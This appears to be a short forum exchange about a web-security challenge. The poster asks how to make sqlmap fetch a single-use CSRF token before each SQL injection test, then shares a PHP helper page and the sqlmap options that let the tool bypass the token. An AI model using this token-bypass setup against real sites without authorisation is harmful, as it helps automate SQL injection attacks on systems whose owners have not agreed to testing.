I'm doing a challenge where there is a webpage which allows sql injection. Every request submitted needs a token which you retrieve from another webpage. The token is valid limited time and for one request only.
Is there a way to tell sqlmap before each test to get the token maybe with a custom script?
KR, dk
Solved creating custom php page which gets the token from site manipulates it and provides in a format for sqlmap. Assuming token-generator.php replies with a plain text string only:
# bypass-csrf.php
<?php
$t = file_get_contents('http://_site_/token-generator.php');
echo '<input type="hidden" name="token" value="' . $t . '">';
echo $t;
?>
sqlmap paramenters: --csrf-url="http://127.0.0.1/bypass-csrf.php" --csrf-token="token"
dk